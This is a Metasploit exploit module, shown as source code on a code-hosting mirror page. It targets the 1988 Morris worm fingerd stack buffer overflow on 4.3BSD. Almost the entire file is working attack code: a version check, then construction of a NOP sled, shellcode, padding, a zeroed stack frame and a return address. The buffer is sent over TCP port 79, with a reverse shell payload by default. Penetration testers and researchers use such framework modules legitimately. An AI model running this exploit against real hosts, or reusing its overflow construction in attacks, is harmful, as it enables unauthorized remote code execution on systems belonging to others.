Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/bsd/finger/morris_fingerd_bof.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = NormalRanking

9


10
  # This is so one-off that we define it here

11
  ARCH_VAX = 'vax'

12


13
  include Msf::Exploit::Remote::Tcp

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Morris Worm fingerd Stack Buffer Overflow',

21
        'Description' => %q{

22
          This module exploits a stack buffer overflow in fingerd on 4.3BSD.

23


24
          This vulnerability was exploited by the Morris worm in 1988-11-02.

25
          Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

26


27
          Currently, only bsd/vax/shell_reverse_tcp is supported.

28
        },

29
        'Author' => [

30
          'Robert Tappan Morris', # Discovery? Exploit and worm for sure

31
          'Cliff Stoll',          # The Cuckoo's Egg epilogue and inspiration

32
          'wvu'                   # Module, payload, and additional research

33
        ],

34
        'References' => [

35
          ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History

36
          ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis

37
          ['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'],   # Details

38
          ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source

39
          ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup

40
          # And credit to the innumerable VAX ISA docs on the Web

41
        ],

42
        'DisclosureDate' => '1988-11-02',

43
        'License' => MSF_LICENSE,

44
        'Platform' => 'bsd',

45
        'Arch' => ARCH_VAX,

46
        'Privileged' => false, # Depends on inetd.conf, usually "nobody"

47
        'Targets' => [

48
          # https://en.wikipedia.org/wiki/Source_Code_Control_System

49
          [

50
            '@(#)fingerd.c   5.1 (Berkeley) 6/6/85',

51
            {

52
              'Ret' => 0x7fffe9b0,

53
              'Payload' => {

54
                'Space' => 403,

55
                'BadChars' => "\n",

56
                'Encoder' => 'generic/none', # There is no spoon

57
                'DisableNops' => true # Hardcoded NOPs

58
              }

59
            }

60
          ]

61
        ],

62
        'DefaultTarget' => 0,

63
        'DefaultOptions' => { 'PAYLOAD' => 'bsd/vax/shell_reverse_tcp' },

64
        'Notes' => {

65
          'Reliability' => [ REPEATABLE_SESSION ],

66
          'Stability' => [ CRASH_SERVICE_RESTARTS ],

67
          'SideEffects' => [ IOC_IN_LOGS ]

68
        }

69
      )

70
    )

71


72
    register_options([Opt::RPORT(79)])

73
  end

74


75
  def check

76
    token = rand_text_alphanumeric(8..42)

77


78
    connect

79
    sock.put("#{token}\n")

80
    res = sock.get_once

81


82
    return CheckCode::Unknown unless res

83


84
    if res.include?("Login name: #{token}")

85
      return CheckCode::Detected

86
    end

87


88
    CheckCode::Safe

89
  rescue EOFError, Rex::ConnectionError => e

90
    vprint_error(e.message)

91
    CheckCode::Unknown

92
  ensure

93
    disconnect

94
  end

95


96
  def exploit

97
    # Start by generating our custom VAX shellcode

98
    shellcode = payload.encoded

99


100
    # 0x01 is NOP in VAX-speak

101
    nops = "\x01" * (target.payload_space - shellcode.length)

102


103
    # This pads past buffer corruption

104
    padding = rand_text_alphanumeric(109)

105


106
    # This zeroes out part of the stack frame

107
    frame = "\x00" * 16

108


109
    # Finally, pack in our return address

110
    ret = [target.ret].pack('V') # V is for VAX!

111


112
    # The newline is for gets(3)

113
    sploit = nops + shellcode + padding + frame + ret + "\n"

114


115
    # Fire away

116
    print_status('Connecting to fingerd')

117
    connect

118
    print_status("Sending #{sploit.length}-byte buffer")

119
    sock.put(sploit)

120
  # Hat tip @bcoles

121
  rescue Rex::ConnectionError => e

122
    fail_with(Failure::Unreachable, e.message)

123
  ensure

124
    disconnect

125
  end

126


127
end

128


129